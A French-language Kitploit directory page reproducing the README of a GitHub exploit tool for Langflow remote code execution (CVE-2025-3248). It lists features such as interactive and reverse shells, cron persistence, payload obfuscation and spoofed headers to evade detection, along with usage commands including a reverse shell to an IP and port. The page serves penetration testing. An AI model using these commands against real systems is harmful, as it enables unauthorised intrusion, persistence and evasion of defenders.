Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
langflow-rce-exploit — Exploit d'exécution de code à distance pour Langflow (CVE-2025-3248) - [ Par S4Tech ] | Kitploit
Outils/GitHubGitHub/0-d3y/langflow-rce-exploit
Escalade de PrivilègesMécanismes de PersistanceAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
715il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
0-d3y/langflow-rce-exploit

langflow-rce-exploit

Exploit d'exécution de code à distance pour Langflow (CVE-2025-3248) - [ Par S4Tech ]

Voir le dépôt

Exploit RCE Langflow (CVE-2025-3248)

Python Version License Platform

Exploit d'exécution de code à distance pour Langflow (CVE-2025-3248)

Fonctionnalités

  • Détection automatique des vulnérabilités
  • Modes d'exploitation multiples :
    • Shell interactif
    • Exécution d'une seule commande
    • Connexion de shell inverse
  • Capacité de téléversement de fichiers
  • Interface utilisateur colorisée
  • Méthodes multiples de shell inverse
  • Persistance de l'historique des commandes

📌 Journal des modifications (v2.0)

✨ Nouvelles fonctionnalités :

  • Système de payload avancé avec 5 méthodes d'exécution
  • Téléchargement/téléversement de fichiers avec encodage Base64
  • Persistance via des tâches cron (commande persist)
  • Améliorations du shell interactif :
    • upload chemin_local chemin_distant
    • download chemin_distant chemin_local
    • Commande clear pour le terminal

🛡️ Améliorations de sécurité :

  • Obfuscation automatique des payloads (Base64 + variantes aléatoires)
  • Rotation des en-têtes par requête :
    • User-Agent aléatoire
    • Adresses IP X-Forwarded-For usurpées
  • Contournement HTTPS (prise en charge des certificats auto-signés)
  • Pas de redirections pour éviter la détection

⚡ Améliorations techniques :

  • Vérification de vulnérabilité en plusieurs étapes
  • Gestion améliorée des erreurs pour les connexions instables
  • Journalisation complète des sessions dans exploit_log.txt
  • Persistance de l'historique des commandes (.langflow_shell_history)

📊 Comparaison des versions :

🐛 Corrections de bugs :

  • Correction des problèmes de connexion HTTPS
  • Meilleure gestion des caractères spéciaux dans les commandes
  • Stabilisation de la fiabilité du shell inverse

Prérequis

  • Python 3.6 ou plus récent
  • Bibliothèques requises :
    • requests
    • colorama
    • readline

Installation

root@kitploit:~
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

Utilisation

root@kitploit:~
python exploit.py <URL> [options]

Options disponibles :

Exemples :

  1. Vérifier la vulnérabilité :
root@kitploit:~
python exploit.py http://target.com
  1. Démarrer un shell interactif :
root@kitploit:~
python exploit.py http://target.com --shell
  1. Exécuter une seule commande :
root@kitploit:~
python exploit.py http://target.com --command "whoami"
  1. Lancer un shell inverse :
root@kitploit:~
python exploit.py http://target.com --reverse 192.168.1.100 4444

Captures d'écran

Image.png)

Avertissement

âڑ ï¸ڈ Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.
âڑ ï¸ڈ Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester est illégale.

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

Auteur

  • Mr.SaMi
    Twitter
    Instagram

Contribution

Les pull requests sont les bienvenues. Pour des changements majeurs, veuillez d'abord ouvrir une issue pour discuter de ce que vous souhaitez modifier.

Télécharger l’outil
Fonctionnalitév1.0v2.0
Méthodes de payload15
Transfert de fichiers❌ Non pris en charge✅ Pris en charge
Persistance❌✅
FurtivitéBasiqueAvancée
Journalisation de session❌✅
OptionDescription
--shellDémarrer un shell interactif
--reverse IP PORTLancer un shell inverse vers IP:PORT donné
--command CMDExécuter une seule commande
--verboseActiver la sortie détaillée
--timeout SECDéfinir le délai d'attente des requêtes (défaut : 10s)